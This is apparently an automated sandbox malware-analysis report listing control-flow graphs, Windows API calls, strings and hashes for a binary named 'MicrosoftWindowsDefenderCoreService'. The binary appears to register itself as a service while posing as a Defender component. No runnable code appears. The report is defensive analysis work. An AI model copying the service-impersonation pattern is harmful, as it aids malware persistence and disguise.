20599 7ff76e1ab6d0 20596->20599 20598 7ff76e19ecf9 20598->20574 20600 7ff76e1ab6e1 20599->20600 20601 7ff76e1ab6ef 20600->20601 20603 7ff76e1a2700 20600->20603 20604 7ff76e1a2544 __crtLCMapStringW 2 API calls 20603->20604 20605 7ff76e1a2728 20604->20605 20605->20601

Control-flow Graph

• Executed
• Not Executed
                                                                                                      control_flow_graph 0 7ff76e1831e0-7ff76e183229 GetModuleFileNameW 1 7ff76e183311-7ff76e18342e call 7ff76e18ca60 call 7ff76e181300 OpenSCManagerW 0->1 2 7ff76e18322f-7ff76e18325a 0->2 11 7ff76e183434-7ff76e183527 1->11 12 7ff76e1835b1-7ff76e183612 CreateServiceW 1->12 4 7ff76e183260-7ff76e18326c 2->4 4->4 6 7ff76e18326e-7ff76e183289 4->6 8 7ff76e183290-7ff76e183298 6->8 8->8 10 7ff76e18329a-7ff76e1832d6 call 7ff76e18df40 call 7ff76e1b7080 call 7ff76e181250 8->10 35 7ff76e18383c-7ff76e183867 call 7ff76e190580 10->35 36 7ff76e1832dc-7ff76e1832ed 10->36 16 7ff76e183530-7ff76e183538 11->16 14 7ff76e18371c-7ff76e18374b 12->14 15 7ff76e183618-7ff76e18365a 12->15 18 7ff76e183751-7ff76e18375d 14->18 19 7ff76e183660-7ff76e183670 15->19 16->16 20 7ff76e18353a-7ff76e183576 call 7ff76e18df40 call 7ff76e1b7080 call 7ff76e181250 16->20 18->18 23 7ff76e18375f-7ff76e18377a 18->23 19->19 24 7ff76e183672-7ff76e18368a 19->24 55 7ff76e18357c-7ff76e18358d 20->55 56 7ff76e183800-7ff76e183808 20->56 27 7ff76e183780-7ff76e183788 23->27 28 7ff76e183691-7ff76e183699 24->28 27->27 32 7ff76e18378a-7ff76e1837ad call 7ff76e18df40 call 7ff76e181250 27->32 28->28 33 7ff76e18369b-7ff76e1836e0 call 7ff76e18df40 call 7ff76e1b7080 call 7ff76e181250 CloseServiceHandle 28->33 52 7ff76e1837b2-7ff76e1837ba 32->52 33->56 72 7ff76e1836e6-7ff76e1836f7 33->72 40 7ff76e183837 call 7ff76e1905a0 36->40 41 7ff76e1832f3-7ff76e183306 36->41 40->35 46 7ff76e18386e-7ff76e183873 call 7ff76e19c3e4 41->46 47 7ff76e18330c 41->47 67 7ff76e183874-7ff76e183879 call 7ff76e19c3e4 46->67 47->40 57 7ff76e1837ed-7ff76e1837ff CloseServiceHandle * 2 52->57 58 7ff76e1837bc-7ff76e1837cd 52->58 61 7ff76e183593-7ff76e1835a6 55->61 62 7ff76e183712-7ff76e183717 call 7ff76e1905a0 55->62 56->35 63 7ff76e18380a-7ff76e183820 56->63 57->56 64 7ff76e1837e8 call 7ff76e1905a0 58->64 65 7ff76e1837cf-7ff76e1837e2 58->65 61->67 68 7ff76e1835ac 
61->68 62->56 63->40 70 7ff76e183822-7ff76e183835 63->70 64->57 65->64 71 7ff76e183880-7ff76e1838cd call 7ff76e19c3e4 RegisterServiceCtrlHandlerW 65->71 82 7ff76e18387a-7ff76e18387f call 7ff76e19c3e4 67->82 68->62 70->40 76 7ff76e183868-7ff76e18386d call 7ff76e19c3e4 70->76 85 7ff76e183b38-7ff76e183ba6 SetServiceStatus CreateEventW 71->85 86 7ff76e1838d3-7ff76e183af7 call 7ff76e18c730 call 7ff76e18ca60 call 7ff76e183d40 71->86 72->62 77 7ff76e1836f9-7ff76e18370c 72->77 76->46 77->62 77->82 82->71 88 7ff76e183ba8-7ff76e183bff SetServiceStatus CreateThread 85->88 89 7ff76e183c01-7ff76e183c36 call 7ff76e1b7080 SetServiceStatus 85->89 96 7ff76e183c44-7ff76e183c58 call 7ff76e190580 86->96 102 7ff76e183afd-7ff76e183b13 86->102 88->89 91 7ff76e183c3c 88->91 89->91 91->96 103 7ff76e183b2e-7ff76e183b33 call 7ff76e1905a0 102->103 104 7ff76e183b15-7ff76e183b28 102->104 103->96 104->103 105 7ff76e183c59-7ff76e183c67 call 7ff76e19c3e4 104->105 110 7ff76e183c6d-7ff76e183cd9 SetServiceStatus SetEvent 105->110 111 7ff76e183d36-7ff76e183d3a 105->111 112 7ff76e183cdb-7ff76e183ce1 110->112 113 7ff76e183ce3-7ff76e183cf0 110->113 114 7ff76e183cf7-7ff76e183d0b 112->114 115 7ff76e183d0d 113->115 116 7ff76e183cf2-7ff76e183cf5 113->116 117 7ff76e183d13-7ff76e183d2a SetServiceStatus 114->117 115->117 116->114 116->115 117->111
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: Service$_invalid_parameter_noinfo_noreturn$ErrorLastStatus$CloseCreateHandle$Event$CtrlFileHandlerManagerModuleNameOpenRegisterThread
• String ID: %s$%s (%d)$%s (%d)$%s (%d)$Microsoft Windows Defender Core Service$MicrosoftWindowsDefenderCoreService$MicrosoftWindowsDefenderCoreService$ggiw$h$wy$wjyp
• API String ID: 1620023548-2121530606
• Opcode ID: 4698ba084db337f1926770bf5d794d63a9ca90ae822dd769ec67dbca79ed55bc
• Instruction ID: 0defbf4164db25b38007ad0d3792e968173a21bacbfa599d10557c408ded4f13
• Opcode Fuzzy Hash: 4698ba084db337f1926770bf5d794d63a9ca90ae822dd769ec67dbca79ed55bc
• Instruction Fuzzy Hash: FC62C462E08681CAE704EF74E4402AEB3A1FF49754F901236DA5C87695EF3CE185DB39

Control-flow Graph
                                                                                                      control_flow_graph 118 7ff76e182090-7ff76e182627 call 7ff76e18ca60 * 2 123 7ff76e182630-7ff76e182678 118->123 123->123 124 7ff76e18267a-7ff76e18267e 123->124 125 7ff76e18269e-7ff76e1826bf call 7ff76e18ca60 GetCurrentProcessId 124->125 126 7ff76e182680-7ff76e182685 124->126 130 7ff76e1826c0-7ff76e1826ed 125->130 128 7ff76e182690-7ff76e18269c 126->128 128->125 128->128 130->130 131 7ff76e1826ef-7ff76e1827d7 call 7ff76e18eb90 130->131 134 7ff76e1827e0-7ff76e1827ef 131->134 134->134 135 7ff76e1827f1-7ff76e182840 call 7ff76e18ca60 134->135 138 7ff76e182842-7ff76e18287e call 7ff76e1b45c0 135->138 139 7ff76e182880-7ff76e18289e call 7ff76e18e340 135->139 144 7ff76e1828a5-7ff76e182a09 ShellExecuteExW 138->144 139->144 145 7ff76e182a10-7ff76e182a26 144->145 145->145 146 7ff76e182a28-7ff76e182a66 call 7ff76e18ca60 lstrcmpiW 145->146 149 7ff76e182a6c call 7ff76e1831e0 146->149 150 7ff76e182c91-7ff76e182cca StartServiceCtrlDispatcherW 146->150 154 7ff76e182a71-7ff76e182a7d 149->154 152 7ff76e182fc5-7ff76e182fd0 150->152 153 7ff76e182cd0-7ff76e182f88 call 7ff76e18c820 call 7ff76e18ca60 call 7ff76e183d40 150->153 155 7ff76e18300b-7ff76e18302d 152->155 156 7ff76e182fd2-7ff76e182feb 152->156 219 7ff76e182f8a-7ff76e182fa3 153->219 220 7ff76e182fc3 153->220 158 7ff76e182ab8-7ff76e182ada 154->158 159 7ff76e182a7f-7ff76e182a98 154->159 162 7ff76e183068-7ff76e183085 155->162 163 7ff76e18302f-7ff76e183048 155->163 160 7ff76e182fed-7ff76e183000 156->160 161 7ff76e183006 call 7ff76e1905a0 156->161 171 7ff76e182adc-7ff76e182af5 158->171 172 7ff76e182b15-7ff76e182b32 158->172 167 7ff76e182a9a-7ff76e182aad 159->167 168 7ff76e182ab3 call 7ff76e1905a0 159->168 160->161 169 7ff76e1831bf-7ff76e1831c4 call 7ff76e19c3e4 160->169 161->155 165 7ff76e1830bd-7ff76e1830c8 162->165 166 7ff76e183087-7ff76e183099 162->166 173 7ff76e18304a-7ff76e18305d 163->173 174 7ff76e183063 call 7ff76e1905a0 163->174 
181 7ff76e1830ca-7ff76e1830e3 165->181 182 7ff76e183103-7ff76e18311d 165->182 177 7ff76e18309b-7ff76e1830ae 166->177 178 7ff76e1830b4-7ff76e1830bc call 7ff76e1905a0 166->178 167->168 167->169 168->158 187 7ff76e1831c5-7ff76e1831ca call 7ff76e19c3e4 169->187 185 7ff76e182af7-7ff76e182b0a 171->185 186 7ff76e182b10 call 7ff76e1905a0 171->186 179 7ff76e182b6a-7ff76e182b75 172->179 180 7ff76e182b34-7ff76e182b46 172->180 173->174 173->187 174->162 177->178 197 7ff76e1831cb-7ff76e1831d0 call 7ff76e19c3e4 177->197 178->165 193 7ff76e182b77-7ff76e182b90 179->193 194 7ff76e182bb0-7ff76e182bca 179->194 191 7ff76e182b48-7ff76e182b5b 180->191 192 7ff76e182b61-7ff76e182b69 call 7ff76e1905a0 180->192 199 7ff76e1830fe call 7ff76e1905a0 181->199 200 7ff76e1830e5-7ff76e1830f8 181->200 201 7ff76e183154-7ff76e18316e 182->201 202 7ff76e18311f-7ff76e183138 182->202 185->186 185->187 186->172 187->197 191->192 191->197 192->179 207 7ff76e182bab call 7ff76e1905a0 193->207 208 7ff76e182b92-7ff76e182ba5 193->208 209 7ff76e182bcc-7ff76e182be5 194->209 210 7ff76e182c05-7ff76e182c1f 194->210 214 7ff76e1831d1-7ff76e1831d6 call 7ff76e19c3e4 197->214 199->182 200->199 200->214 204 7ff76e182c5a-7ff76e182c90 call 7ff76e190580 201->204 205 7ff76e183174-7ff76e18318d 201->205 216 7ff76e18313a-7ff76e18314d 202->216 217 7ff76e18314f call 7ff76e1905a0 202->217 221 7ff76e182c55 call 7ff76e1905a0 205->221 222 7ff76e183193-7ff76e1831a6 205->222 207->194 208->207 208->214 225 7ff76e182be7-7ff76e182bfa 209->225 226 7ff76e182c00 call 7ff76e1905a0 209->226 210->204 227 7ff76e182c21-7ff76e182c3a 210->227 216->217 231 7ff76e1831ad-7ff76e1831b2 call 7ff76e19c3e4 216->231 217->201 232 7ff76e182fbe call 7ff76e1905a0 219->232 233 7ff76e182fa5-7ff76e182fb8 219->233 220->152 221->204 234 7ff76e1831a8 222->234 235 7ff76e1831b3-7ff76e1831b8 call 7ff76e19c3e4 222->235 225->226 225->231 226->210 227->221 238 7ff76e182c3c-7ff76e182c4f 227->238 231->235 232->220 233->232 242 7ff76e1831b9-7ff76e1831be call 7ff76e19c3e4 
233->242 234->221 235->242 238->221 238->235 242->169
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$Event$Source$Concurrency::cancel_current_taskCtrlCurrentDeregisterDispatcherErrorExecuteLastProcessRegisterReportServiceShellStartlstrcmpi
• String ID: )4$++$3&$>$G.$MicrosoftWindowsDefenderCoreService$O$O$P$h$h$h$m$m$n$p$t$u$y$z${
• API String ID: 320493407-2801309204
• Opcode ID: 3335491839efc0a822470bfbcb9017b3bbd4571457d321bc2182deb53b8a3e6d
• Instruction ID: 1ca9ad8e6086db460cacc772ef49dfbe563a68bcdcd135cba1e035cc9c6653f6
• Opcode Fuzzy Hash: 3335491839efc0a822470bfbcb9017b3bbd4571457d321bc2182deb53b8a3e6d
• Instruction Fuzzy Hash: F492D666A146C1CAE724AF74E4003FD73B0FF58748F806136E65C8BAA4EB3C9581D729

Control-flow Graph
                                                                                                      control_flow_graph 249 7ff76e1a3acc-7ff76e1a3af1 250 7ff76e1a3dbf 249->250 251 7ff76e1a3af7-7ff76e1a3afa 249->251 252 7ff76e1a3dc1-7ff76e1a3dd1 250->252 253 7ff76e1a3b33-7ff76e1a3b5f 251->253 254 7ff76e1a3afc-7ff76e1a3b2e call 7ff76e19c2f8 251->254 255 7ff76e1a3b61-7ff76e1a3b68 253->255 256 7ff76e1a3b6a-7ff76e1a3b70 253->256 254->252 255->254 255->256 258 7ff76e1a3b80-7ff76e1a3b95 call 7ff76e1ae834 256->258 259 7ff76e1a3b72-7ff76e1a3b7b call 7ff76e1a77f8 256->259 264 7ff76e1a3caf-7ff76e1a3cb8 258->264 265 7ff76e1a3b9b-7ff76e1a3ba4 258->265 259->258 267 7ff76e1a3cba-7ff76e1a3cc0 264->267 268 7ff76e1a3d0c-7ff76e1a3d31 WriteFile 264->268 265->264 266 7ff76e1a3baa-7ff76e1a3bae 265->266 271 7ff76e1a3bb0-7ff76e1a3bb8 call 7ff76e19a9a0 266->271 272 7ff76e1a3bbf-7ff76e1a3bca 266->272 273 7ff76e1a3cc2-7ff76e1a3cc5 267->273 274 7ff76e1a3cf8-7ff76e1a3d05 call 7ff76e1a3584 267->274 269 7ff76e1a3d33-7ff76e1a3d39 call 7ff76e1b7080 268->269 270 7ff76e1a3d3c 268->270 269->270 277 7ff76e1a3d3f 270->277 271->272 281 7ff76e1a3bcc-7ff76e1a3bd5 272->281 282 7ff76e1a3bdb-7ff76e1a3bf0 call 7ff76e1b72e0 272->282 279 7ff76e1a3ce4-7ff76e1a3cf6 call 7ff76e1a37a4 273->279 280 7ff76e1a3cc7-7ff76e1a3cca 273->280 285 7ff76e1a3d0a 274->285 287 7ff76e1a3d44 277->287 293 7ff76e1a3c9c-7ff76e1a3ca3 279->293 289 7ff76e1a3d50-7ff76e1a3d5a 280->289 290 7ff76e1a3cd0-7ff76e1a3ce2 call 7ff76e1a3688 280->290 281->264 281->282 300 7ff76e1a3bf6-7ff76e1a3bfc 282->300 301 7ff76e1a3ca8 282->301 285->293 294 7ff76e1a3d49 287->294 296 7ff76e1a3db8-7ff76e1a3dbd 289->296 297 7ff76e1a3d5c-7ff76e1a3d61 289->297 290->293 293->287 294->289 296->252 298 7ff76e1a3d8f-7ff76e1a3d99 297->298 299 7ff76e1a3d63-7ff76e1a3d66 297->299 307 7ff76e1a3da0-7ff76e1a3daf 298->307 308 7ff76e1a3d9b-7ff76e1a3d9e 298->308 303 7ff76e1a3d7f-7ff76e1a3d8a call 7ff76e19d318 299->303 304 7ff76e1a3d68-7ff76e1a3d77 299->304 305 
7ff76e1a3c02-7ff76e1a3c05 300->305 306 7ff76e1a3c85-7ff76e1a3c97 call 7ff76e1a310c 300->306 301->264 303->298 304->303 310 7ff76e1a3c10-7ff76e1a3c1e 305->310 311 7ff76e1a3c07-7ff76e1a3c0a 305->311 306->293 307->296 308->250 308->307 314 7ff76e1a3c20 310->314 315 7ff76e1a3c7c-7ff76e1a3c80 310->315 311->294 311->310 316 7ff76e1a3c24-7ff76e1a3c3b call 7ff76e1aea7c 314->316 315->277 319 7ff76e1a3c73-7ff76e1a3c79 call 7ff76e1b7080 316->319 320 7ff76e1a3c3d-7ff76e1a3c49 316->320 319->315 322 7ff76e1a3c68-7ff76e1a3c6f 320->322 323 7ff76e1a3c4b-7ff76e1a3c5d call 7ff76e1aea7c 320->323 322->315 324 7ff76e1a3c71 322->324 323->319 328 7ff76e1a3c5f-7ff76e1a3c66 323->328 324->316 328->322
APIs
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
• Opcode ID: 22a347ff353ab49432d2b42e96d8d9a8c726387284fb579308b91fa641ddd612
• Instruction ID: e89341eee3a6507a0bd9f3910056b1efb815e622078f23d0224c5628ad99183e
• Opcode Fuzzy Hash: 22a347ff353ab49432d2b42e96d8d9a8c726387284fb579308b91fa641ddd612
• Instruction Fuzzy Hash: 4291C862F18651C5F758AF69A8443BCABA0BB04B84FD4413ADE0E57A84DF3CD443A738

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0

APIs
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 1236291503-0

APIs
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0

APIs
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0

APIs
Similarity
• API ID: Initialize_invalid_parameter_noinfo_set_fmode
• String ID:
• API String ID: 3548387204-0

APIs
Similarity
• API ID: EnvironmentStrings$Free
• String ID:
• API String ID: 3328510275-0

APIs
Similarity
• API ID: HandleModule$AddressFreeLibraryProc
• String ID:
• API String ID: 3947729631-0

APIs
• __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF76E190B94
  • Part of subcall function 00007FF76E1927A0: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF76E1927A8
  • Part of subcall function 00007FF76E1927A0: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF76E1927AD
Similarity
• API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
• String ID:
• API String ID: 1208906642-0
APIs
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
APIs
Strings
Similarity
• API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
• String ID: utf8
• API String ID: 3069159798-905460609
APIs
Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
Similarity
• API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
• String ID:
Similarity
• API ID: FileInternet$OpenRead$CloseCreateHandleWrite
• String ID:
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF76E1A603B
  • Part of subcall function 00007FF76E19C414: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF76E19C41D
  • Part of subcall function 00007FF76E19C414: GetCurrentProcess.KERNEL32 ref: 00007FF76E19C442
Similarity
• API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
• String ID: PATH$\
Similarity
• API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait_invalid_parameter_noinfo
• String ID:
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$f$p$p$f
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
Similarity
• API ID: _invalid_parameter_noinfo_noreturn
• String ID: Failed to open file: $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$version=
                                                                                                      • API String ID: 3668304517-3690914312
                                                                                                      • Opcode ID: 1cfdb8d0b34dda5e2b6a14e7cd690e97adb5edae016d53631456050e3210f026
                                                                                                      • Instruction ID: 1bf2d4fe411e00c2a16ac20cc298e9d6df1005c5fb657686af32197ec2574627
                                                                                                      • Opcode Fuzzy Hash: 1cfdb8d0b34dda5e2b6a14e7cd690e97adb5edae016d53631456050e3210f026
                                                                                                      • Instruction Fuzzy Hash: D1C1C722F14B85C6EB14EB65E4803BEA761FB40B88F808136DA4D57AD9DF7CE481D364

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: ee297f9163e0f4433d44ddb9cb44c8a0d7b8774eba215f582c9318408fc80d28
• Instruction ID: 21df551d3b8d7159b3070c821db03270b2ec9c1b6872e94ae9cef2012ae828c2
• Opcode Fuzzy Hash: ee297f9163e0f4433d44ddb9cb44c8a0d7b8774eba215f582c9318408fc80d28
• Instruction Fuzzy Hash: 2D41E461B1AA02C1FA1EEB1BB9005B5A291BF45BE0F844235DD1D87B94EF3CE445E738

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: Event$Source$DeregisterErrorLastRegisterReport
• String ID: %s failed with %d$MicrosoftWindowsDefenderCoreService$MicrosoftWindowsDefenderCoreService
• API String ID: 544316925-1642833198
• Opcode ID: 3dc40fa490e00813dccf98bc73929a08a4ac8a948f6b890265eb78da6b3d84f4
• Instruction ID: 502e0b7905e47f9d3276025047dffa26889ecfd6bdff33dca7814adb34993b88
• Opcode Fuzzy Hash: 3dc40fa490e00813dccf98bc73929a08a4ac8a948f6b890265eb78da6b3d84f4
• Instruction Fuzzy Hash: 4A111F32A08B85C6EB599B10F4553AAB3A0FB8D744F801136EA8D43B54EF7CD154DB24

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: f$p$p
• API String ID: 3215553584-1995029353
• Opcode ID: e082a461071b6da24f3492d34e17e8e84d0aafa2cd8011b319846d8f4dadc02c
• Instruction ID: 6072494060513f57803dcf91a8d8a56fd2d9a1437cc911a0cb38f9fc09d8edc4
• Opcode Fuzzy Hash: e082a461071b6da24f3492d34e17e8e84d0aafa2cd8011b319846d8f4dadc02c
• Instruction Fuzzy Hash: EF1286E2F0C143C6FB187A19B1542B9F6A2EB41750FD84035E69A47EC4DB7CE848A738

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e95652fa3470eead33a2fc63796d06924de8eb24e60a75e7e39f100f9d82b40c
• Instruction ID: 6d0b9d9022216e9232062301adc8cdbc984759ebbcc06335d608021772fe7606
• Opcode Fuzzy Hash: e95652fa3470eead33a2fc63796d06924de8eb24e60a75e7e39f100f9d82b40c
• Instruction Fuzzy Hash: 35C10822A0C786C1E7196B59B4002BDFB95EF80B80FD50136DA4D03BD9DE7CEA55A738

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: a5a05adb5d86b50c8c6e6eed927ac3269ff3a31544a40d678027116eb92af1ea
• Instruction ID: 956cac2c3ce7bbcf605a1f31a7943bd8572af9569c355af3b8bab530d91c1139
• Opcode Fuzzy Hash: a5a05adb5d86b50c8c6e6eed927ac3269ff3a31544a40d678027116eb92af1ea
• Instruction Fuzzy Hash: 5131C521B1A642C1EE19FB12B404579A3D5BF04BA1FD90535DD1D17790EF3CE8449738

Memory Dump Source
• Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
• Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmp
• Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmp
